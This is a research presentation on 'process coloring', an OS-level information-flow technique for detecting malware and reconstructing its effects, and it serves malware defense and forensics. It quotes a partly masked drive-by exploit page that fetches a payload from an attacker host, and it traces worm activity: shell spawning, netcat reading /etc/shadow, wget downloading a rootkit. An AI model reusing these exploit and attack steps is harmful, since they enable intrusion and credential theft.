NICIAR Site Visit West Lafayette IN July 19

NICIAR Site Visit, West Lafayette, IN, July 19, 2007

Process Coloring: an Information Flow-Preserving Approach to Malware Investigation

Eugene Spafford, Dongyan Xu (Presenter)
Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS)
Purdue University

Xuxian Jiang
Department of Information and Software Engineering
George Mason University

Motivation
  • Internet malware remains a top threat
      • Malware: viruses, worms, rootkits, spyware, bots…

Motivation
  • Upon clicking a malicious URL: http: //xxx. 9 x. xx 8. 8 x/users/xxxx/laxx/z. html
  • Result (annotated on the slide with MS05-002, MS03-011, MS04-013):
<html><head><title></head><body> <style> * {CURSOR: url("http: //vxxxxxxe. biz/adverts/033/sploit. anr")} </style> <APPLET ARCHIVE='count. jar' CODE='Black. Box. class' WIDTH=1 HEIGHT=1> <PARAM NAME='url' VALUE='http: //vxxxxxxe. biz/adverts/033/win 32. exe'></APPLET> <script> try{ document. write('<object data=`&#109&#115&#45&#105&#116&#115&#58 &#109&#104&#116&#109&#108&#58&#102&#105&#108&#101: //C: fo'+'o. mht!'+'http: //vxxxx'+'xxe. biz//adv'+'erts//033//targ. ch'+ 'm: : /targ'+'et. htm` type=`text/x-scriptlet`></ob'+'ject>'); }catch(e){} </script> </body></html>
  • 22 unwanted programs are installed without the user’s consent!

Our Challenge: Enabling Timely, Efficient Malware Investigation
  • Raising a timely alert to trigger a malware investigation
  • Identifying the break-in point of the malware
  • Reconstructing all contaminations by the malware
[Figure: timeline from infection to detection, with a log collected over time. From the external detection point, break-in point trace-back runs backward and contamination reconstruction runs forward. Caption: today’s log-based intrusion investigation tools (e.g., BackTracker, Taser)]

Limitations of Today’s Tools
  • Long “infection-to-detection” interval
  • Entire log needed for both trace-back and reconstruction
  • Questionable trustworthiness of log data
[Figure: timeline from infection to detection, with a log collected over time, break-in point trace-back, contamination reconstruction, and the external detection point. Caption: existing log-based intrusion investigation tools]

Goals of Research
  • Improve malware defense capabilities of enterprise computing infrastructure:
      • Detection of malware activity
      • Identification of vulnerable programs/applications
      • Accountability of computation activities
      • Recoverability from malware contaminations
      • Proactive protection of sensitive information/data
  • Demonstrate via success metrics with respect to:
      • Timeliness
      • Efficiency
      • Accuracy

Goals of Research
  • Goals fit within NICECAP research themes
      • “Accountable information flows”
          • Based on information flow theory
          • Instantiated at operating system level
          • Holding malware accountable
      • “Large-scale system defense”
          • Targeting large-scale malware infection (e.g., botnets)
          • Enabling malware detection and remediation
          • Providing first line of response (applicable to legacy applications w/o source code)

Technical Approach: Process Coloring
  • Key idea: propagating malware break-in provenance information (“colors”) along OS-level information flows
      • Existing tools only consider direct causality relations, without preserving and exploiting break-in provenance information
[Figure: a virtual machine whose guest OS runs Apache, Sendmail, DNS, MySQL, … and a logger. An attacker targets Apache. A log monitor at the virtual machine monitor (VMM) level raises a runtime alert triggered by log color anomalies]

New Capabilities of Process Coloring
  • Color-based malware warning (vs. external detection point)
  • Color-based break-in point identification (vs. back-tracking)
  • Color-based log partitioning (vs. entire log) for reconstruction
[Figure: timeline from infection to detection, marking the break-in point and contamination reconstruction]

Impact of Success
  • How will it benefit the NIC?
      • Accountability of NIC cyber infrastructure
      • Readiness against current and emerging malware threats (e.g., botnets, rootkits, spyware) to NIC
      • Protection of NIC critical data, information, and computation activities
      • Reduction of NIC human labor in malware investigation

Impact of Success
  • How will it benefit the IA community?
      • Systematic model for OS-level information flows
      • Mechanisms and policies for elevated accountability of commodity OS
      • Tools and methods for malware alert, investigation, and recovery
      • Artifacts, data, insights, and lessons for further malware research

Sample Scenario
  • Question 1: How is the malware detected?
  • Question 2: How does the malware break into the system?
  • Question 3: What does the malware do after break-in?
[Figure: process graph with httpd, /bin/sh, netcat, and wget, together with /etc/shadow (confidential info), local files, and a rootkit that raises the alert]

Existing Approach
1. Online log collection
Log:
  • “httpd” READS an incoming request
  • “httpd” CREATES a new process “/bin/sh”
  • “/bin/sh” CREATES a new process “wget”
  • “wget” CREATES local file(s) - “Root kit”
  • “/bin/sh” CREATES a new process “netcat”
  • “netcat” READS “/etc/shadow” file
  • “/bin/sh” MODIFIES local files
[Figure: process graph with httpd, /bin/sh, netcat, and wget, together with /etc/shadow (confidential info), local files, and the rootkit. The rootkit alert is the external detection point]

Existing Approach
1. Online log collection
2. Offline backward tracking
Log entries on the backward path:
  • “wget” CREATES local file(s) - “Root kit”
  • “/bin/sh” CREATES a new process “wget”
  • “httpd” CREATES a new process “/bin/sh”
[Figure: backward tracking [King+, SOSP’03] from the external detection point (rootkit alert) through wget and /bin/sh to httpd, the break-in point]

Existing Approach
1. Online log collection
2. Offline backward tracking
3. Offline forward tracking
Log entries on the forward path:
  • “httpd” CREATES a new process “/bin/sh”
  • “/bin/sh” CREATES a new process “netcat”
  • “netcat” READS “/etc/shadow” file
  • “/bin/sh” MODIFIES local files
  • “/bin/sh” CREATES a new process “wget”
  • “wget” CREATES local file(s) - “Root kit”
[Figure: forward tracking from the break-in point (httpd) through /bin/sh, netcat, and wget to /etc/shadow (confidential info), local files, and the rootkit. The rootkit alert is the external detection point]
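The three steps of the existing approach can be sketched in a few lines of Python. This is only an illustration under simplifying assumptions, not the BackTracker or Taser implementation: the log is a hypothetical in-memory list of (subject, operation, object) triples taken from the slide text (plus one unrelated sendmail entry), backward tracking follows a single causal chain, and the function names are made up for this sketch.

```python
# Events as (subject, operation, object) triples, in log order.
# The sendmail entry is unrelated to the attack and is included for contrast.
LOG = [
    ("sendmail", "READS", "/proc/loadavg"),
    ("httpd", "READS", "incoming request"),
    ("httpd", "CREATES", "/bin/sh"),
    ("/bin/sh", "CREATES", "wget"),
    ("wget", "CREATES", "Root kit"),
    ("/bin/sh", "CREATES", "netcat"),
    ("netcat", "READS", "/etc/shadow"),
    ("/bin/sh", "MODIFIES", "local files"),
]


def backward_track(log, detection_point):
    """Walk the log backwards from the detection point to the break-in point.

    Simplification: only one causal chain is followed, and only CREATES and
    MODIFIES events count as "subject caused object".
    """
    chain = [detection_point]
    current = detection_point
    for subject, op, obj in reversed(log):
        if op != "READS" and obj == current:
            chain.append(subject)
            current = subject
    return chain


def forward_track(log, break_in_point):
    """Collect every action taken by the break-in process and its descendants."""
    tainted = {break_in_point}
    actions = []
    for subject, op, obj in log:
        if subject in tainted:
            actions.append((subject, op, obj))
            if op != "READS":
                # Created processes and modified files become contaminated.
                tainted.add(obj)
    return actions


chain = backward_track(LOG, "Root kit")
contamination = forward_track(LOG, chain[-1])
```

Both functions scan the whole log, which is the limitation the slides attribute to existing tools: nothing in an entry says which break-in it belongs to, so unrelated entries have to be read before they can be discarded.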

Process Coloring Approach
1. Initial coloring
2. Coloring diffusion
  • Capability 1: Color-based malware warning
  • Capability 2: Color-based identification of break-in point
  • Capability 3: Color-based log partition for contamination analysis
[Figure: init and rc start the services s30 sendmail, s55 sshd, s45 named, and s80 httpd. The process graph continues from httpd to /bin/sh, netcat, and wget, together with local files, /etc/shadow (confidential info), the rootkit, and the log]

Timeliness by Process Coloring: Color-Based Malware Warning
...
BLUE: 673["sendmail"]: 5_open("/proc/loadavg", 0, 438) = 5
BLUE: 673["sendmail"]: 192_mmap2(0, 4096, 3, 34, 4294967295, 0) = 1073868800
BLUE: 673["sendmail"]: 3_read(5, "0.26 0.10 0.03 2...", 4096) = 25
BLUE: 673["sendmail"]: 6_close(5) = 0
BLUE: 673["sendmail"]: 91_munmap(1073868800, 4096) = 0
...
RED: 2568["httpd"]: 102_accept(16, sockaddr{2, cbbdff3a}, cbbdff38) = 5
RED: 2568["httpd"]: 3_read(5, "1281124...", 11) = 11
RED: 2568["httpd"]: 3_read(5, "7À51283...", 40) = 40
RED: 2568["httpd"]: 4_write(5, "132@412...", 1090) = 1090
…
RED: 2568["httpd"]: 4_write(5, "12819Ê13618...", 21) = 21
RED: 2568["httpd"]: 63_dup2(5, 2) = 2
RED: 2568["httpd"]: 63_dup2(5, 1) = 1
RED: 2568["httpd"]: 63_dup2(5, 0) = 0
RED: 2568["httpd"]: 11_execve("/bin//sh", bffff4e8, 0000)
RED: 2568["sh"]: 5_open("/etc/ld.so.prelo...", 0, 8) = -2
RED: 2568["sh"]: 5_open("/etc/ld.so.cache", 0, 0) = 6
Capability 1: Color-based malware warning: “unusual color inheritance”
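One way to picture the "unusual color inheritance" warning is a monitor that knows which program names are expected under each color and flags any colored log entry whose program falls outside that set. The sketch below is an assumption about how such a check could look, not the project's log monitor: the entry format is inferred from the log excerpt on the slide, and `EXPECTED` and `color_warnings` are hypothetical names.

```python
import re

# Entry layout inferred from the slide: COLOR: pid["program"]: nr_syscall(args) = ret
ENTRY = re.compile(
    r'^(?P<color>[A-Z+]+): (?P<pid>\d+)\["(?P<prog>[^"]+)"\]: '
    r'(?P<nr>\d+)_(?P<call>\w+)\('
)

# Hypothetical profile: the programs each service color is expected to run.
EXPECTED = {"BLUE": {"sendmail"}, "RED": {"httpd"}}


def color_warnings(lines, expected=EXPECTED):
    """Return (color, pid, program, syscall) for entries outside the profile."""
    alerts = []
    for line in lines:
        m = ENTRY.match(line)
        if m is None:
            continue  # skip elided or malformed lines
        if m["prog"] not in expected.get(m["color"], set()):
            alerts.append((m["color"], int(m["pid"]), m["prog"], m["call"]))
    return alerts


SAMPLE = [
    'BLUE: 673["sendmail"]: 6_close(5) = 0',
    'RED: 2568["httpd"]: 63_dup2(5, 0) = 0',
    'RED: 2568["httpd"]: 11_execve("/bin//sh", bffff4e8, 0000)',
    'RED: 2568["sh"]: 5_open("/etc/ld.so.cache", 0, 0) = 6',
]
alerts = color_warnings(SAMPLE)
```

On this sample the first flagged entry is the one in which a shell carries httpd's RED color, which is the point at which a warning could be raised without waiting for an external detection point.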

Timeliness by Process Coloring: Color-Based Malware Warning
  • Another example: “color mixing”
RED: 1234["httpd"]: …
RED+BLUE: 1234["httpd"]: system call to read file index.html
[Figure: httpd and bind; the command "cp defaced.html index.html" overwrites index.html, which httpd then reads]

Efficiency by Process Coloring
Time period being analyzed: 24 hours

                          Lion                   Slapper                  SARS
# worm-related entries    66,504                 195,884                  19,494
Exploited service         BIND (CVE-2001-0010)   Apache (CAN-2002-0656)   Samba (CAN-2003-0085)
% of log inspected        48.7%                  65.9%                    12.1%

  • Capability 2: Color-based identification of break-in point
  • Capability 3: Color-based log partitioning
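Color-based log partitioning can be illustrated as a filter on the color tag at the start of each entry, followed by the share of the log that remains to be inspected. This is a minimal sketch that assumes the `COLOR: ...` entry prefix seen in the log excerpts and treats `RED+BLUE` as carrying both colors; `partition_by_color` is a hypothetical helper, and the four sample entries are not the data behind the table above.

```python
def partition_by_color(entries, color):
    """Return the entries carrying `color` and their share of the log in percent."""
    selected = []
    for entry in entries:
        tag = entry.split(":", 1)[0]      # e.g. "RED" or "RED+BLUE"
        if color in tag.split("+"):
            selected.append(entry)
    share = 100.0 * len(selected) / len(entries) if entries else 0.0
    return selected, share


LOG = [
    'BLUE: 673["sendmail"]: 6_close(5) = 0',
    'RED: 2568["httpd"]: 63_dup2(5, 0) = 0',
    'RED: 2568["sh"]: 5_open("/etc/ld.so.cache", 0, 0) = 6',
    'BLUE: 673["sendmail"]: 91_munmap(1073868800, 4096) = 0',
]
red_entries, red_share = partition_by_color(LOG, "RED")
```

Only the selected partition needs to be handed to contamination reconstruction; the color of the first anomalous entry also names the service that was broken into.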

Accuracy by Process Coloring
  • Accuracy of color-based malware warning
      • False positives and false negatives
  • Accuracy of malware contamination reconstruction
      • Sufficiency of log partition (“no useful log entries left out”)
      • Compare malware action graphs with published malware analysis report
      • Limitation of causality-based reconstruction algorithms (e.g., BackTracker, Taser)

Accuracy of Malware Contamination Reconstruction: the Slapper Worm Example
[Figure: malware action graph. Nodes and edge labels in the order extracted from the slide:]
  • inet_sock(80)
  • recv, accept
  • 2568: httpd
  • execve
  • dup2, read
  • fd 5
  • 2568(execve): /bin//sh
  • execve
  • 2568(execve): /bin/bash -i
  • fork, execve
  • 2587: /bin/cat
  • open, dup2, write
  • /tmp/.uubugtraq
  • fork, execve
  • 2586: /bin/rm -rf /tmp/.bugtraq.c
  • unlink
  • /tmp/.bugtraq.c

Research Task I: Color Diffusion Model (Month 1-6)
  • Color Diffusion Model
  • OS-level Information Flows

Operation   Flow               Diffusion                             Syscalls
CREATE      create <s1, o1>    color(o1) = color(s1)                 create, mkdir, link
            create <s1, s2>    [not legible in source]               fork, vfork, clone
READ        read <s1, o1>      color(s1) = color(s1) ∪ color(o1)     read, readv, recv
            read <s1, s2>      color(s2) = color(s1) ∪ color(s2)     ptrace
WRITE       write <s1, o1>     color(o1) = color(s1) ∪ color(o1)     write, writev, send
            write <s1, s2>     color(s2) = color(s1) ∪ color(s2)     ptrace, wait, signal
DESTROY     destroy <s1, o1>                                         unlink, rmdir, close
            destroy <s1, s2>                                         exit, kill
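The diffusion rules can be tried out on the "color mixing" example from the earlier slide, where a compromised bind overwrites index.html and httpd later reads it. The sketch below is a toy model, not the Xen-based prototype: it covers only the create, read <s1, o1>, and write <s1, o1> rules, the class and method names are hypothetical, and the rule that a forked child starts with its parent's colors is an assumption made here for illustration.

```python
from collections import defaultdict


class ColorModel:
    """Toy color diffusion over named subjects (processes) and objects (files)."""

    def __init__(self):
        self.colors = defaultdict(set)   # entity name -> set of colors

    def assign(self, entity, color):
        """Initial coloring of a service process."""
        self.colors[entity] = {color}

    def create(self, subject, new_entity):
        # color(o1) = color(s1); applying the same rule to a child process
        # is an assumption of this sketch.
        self.colors[new_entity] = set(self.colors[subject])

    def read(self, subject, obj):
        # color(s1) = color(s1) ∪ color(o1)
        self.colors[subject] |= self.colors[obj]

    def write(self, subject, obj):
        # color(o1) = color(s1) ∪ color(o1)
        self.colors[obj] |= self.colors[subject]

    def mixed(self):
        """Entities that carry more than one color."""
        return sorted(e for e, c in self.colors.items() if len(c) > 1)


model = ColorModel()
model.assign("httpd", "RED")
model.assign("bind", "BLUE")
model.create("bind", "cp")            # compromised bind spawns cp
model.read("cp", "defaced.html")
model.write("cp", "index.html")       # index.html picks up BLUE
model.read("httpd", "index.html")     # httpd becomes RED+BLUE
```

After the last step httpd carries both colors, which corresponds to the RED+BLUE log entry on the color mixing slide. Using sets keeps every break-in provenance a process or file has been exposed to, rather than only the most recent one.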

Research Task II: Process Coloring for Client and Server Side Malware Investigation (Month 2-18)
  • Server-side malware investigation
      • Consolidated server environment with independent server applications
      • “Clustered” information flows partitioned by server applications
      • Color mixing highly unlikely between applications
  • Client-side malware investigation
      • Inter-dependent client applications (e.g., text editor → compiler; latex → dvips → ps2pdf)
      • More inter-application information flows
      • Legal color mixing exists

Research Task II: Process Coloring for Client and Server Side Malware Investigation (Month 2-18)
  • A motivating example of client-side process coloring
[Figure: FTP + Quick Tax, along a time axis]

Research Task III: Color Mixing Handling via Information Flow Control (Month 7-18)
  • Profiling legal color mixing inside a client host
      • Shared files
      • Helper processes
  • Approach 1: information flow insulation
    [Figure: processes P1 and P2 with a shared file, shown without and with the shared file insulated]
  • Approach 2: information flow border control

Related Work Based on Information Flows
  • Instruction level information flows
      • Lacking system-wide semantic information (e.g., info. about processes and files)
  • Language level information flows
      • Focusing on information flows inside a program
  • Operating system level information flows
      • Complementing the above categories
      • Revealing system-wide semantic information
      • Benefiting detection, recovery, and forensics as first line of defense

Metrics: Definitions
  • Timeliness
      • Malware infection-to-warning interval
  • Efficiency
      • Percentage of log reduction for malware contamination reconstruction
  • Accuracy
      • False positive rate of malware warning
      • False negative rate of malware warning
      • Correctness of malware action graphs
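The timeliness and warning-accuracy metrics can be written down as small functions. The slides do not give formulas, so the sketch below assumes the conventional definitions (false positive rate = FP / (FP + TN), false negative rate = FN / (FN + TP)) and uses hypothetical function names and made-up sample numbers.

```python
from datetime import datetime


def infection_to_warning(infected_at, warned_at):
    """Timeliness: seconds between infection and the first color-based warning."""
    return (warned_at - infected_at).total_seconds()


def warning_rates(tp, fp, tn, fn):
    """Accuracy: (false positive rate, false negative rate) of malware warnings.

    tp/fn count infected runs that were / were not warned about;
    fp/tn count clean runs that were / were not warned about.
    """
    fpr = fp / (fp + tn) if (fp + tn) else 0.0
    fnr = fn / (fn + tp) if (fn + tp) else 0.0
    return fpr, fnr


# Made-up numbers, for illustration only.
interval = infection_to_warning(
    datetime(2007, 7, 19, 10, 0, 0), datetime(2007, 7, 19, 10, 0, 30)
)
fpr, fnr = warning_rates(tp=8, fp=1, tn=9, fn=2)
```

Running the same computation with and without process coloring would give the side-by-side comparison that the evaluation plan calls for.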

Metrics: Evaluation Plan
  • Sources of malware
      • Repository of malware (worms, botware, rootkits)
      • Malware captured by honeypots and honeyfarm
  • Target computing environments
      • Consolidated servers
      • Clients
  • Experiment environments
      • VM-based honeyfarm (Collapsar)
      • VM-based malware playground (vGround)
  • Methodology: Evaluate by comparison
      • With process coloring
      • Without process coloring

Project Organization and Management
  • Purdue Team
      • Faculty
          • Eugene Spafford
          • Dongyan Xu
      • Graduate students
          • Ryan Riley
          • Larissa O’Brien
          • TBD
      • Budget
          • $xxx,xxx
  • George Mason Team
      • Faculty
          • Xuxian Jiang
      • Graduate student
          • TBD
      • Budget
          • $xxx,xxx

Project Organization and Management
[Gantt chart over months 1-18, annotated with Quarterly Program Reviews, "June 7th, 2007", and Site Visit markers]
Tasks:
  1. Task I (Section 3.1)
  2. Task II (Section 3.2)
      2.1 Subtask II.1
      2.2 Subtask II.2
      2.3 Subtask II.3
  3. Task III (Section 3.3)
      3.1 Subtask III.1
      3.2 Subtask III.2
      3.3 Subtask III.3
  4. Meetings and Document Prep
  5. Prototype Instantiation
Software Deliverables:
  #1 Basic Xen-based prototype
  #2 Tools for malware investigation
  #3 Mechanisms for color mixing control
Experiments
Software Demonstrations

Project Organization and Management
Spending during Summer ’07:
  • Purdue: One month graduate student support (half-time)
  • GMU: One month summer salary (planned)

Recent Progress
[Gantt chart: the 18-month schedule of Tasks I-III, meetings and document prep, prototype instantiation, software deliverables #1-#3, experiments, and software demonstrations, with Quarterly Program Reviews, "June 7th, 2007", and Site Visit markers and a "We are here" marker]
  • Identifying color diffusion operations in Linux OS
  • Starting to implement log coloring and collection on Xen VMM

Projected Progress in the Next 3-6 Months
[Gantt chart: the 18-month schedule of Tasks I-III, meetings and document prep, prototype instantiation, software deliverables #1-#3, experiments, and software demonstrations, with Quarterly Program Reviews, "June 7th, 2007", and Site Visit markers]
  • 11/21/07: A comprehensive color diffusion model under Linux
  • 12/07/07: Demo and software release of basic Xen-based prototype

Technology Transfer Plan
  • Potential adopters
      • Computer forensics/malware investigators and researchers
      • System administrators
      • Anti-malware software companies
      • Open source communities (e.g., XenSource)
  • Software release and documentation
  • Presentations and demos to potential NIC adopters
  • Presentations and demos to anti-malware software companies (Symantec, Microsoft, VMware)

Thank you!
For more information about the Process Coloring project:
http://cairo.cs.purdue.edu/projects/pc
PC@cs.purdue.edu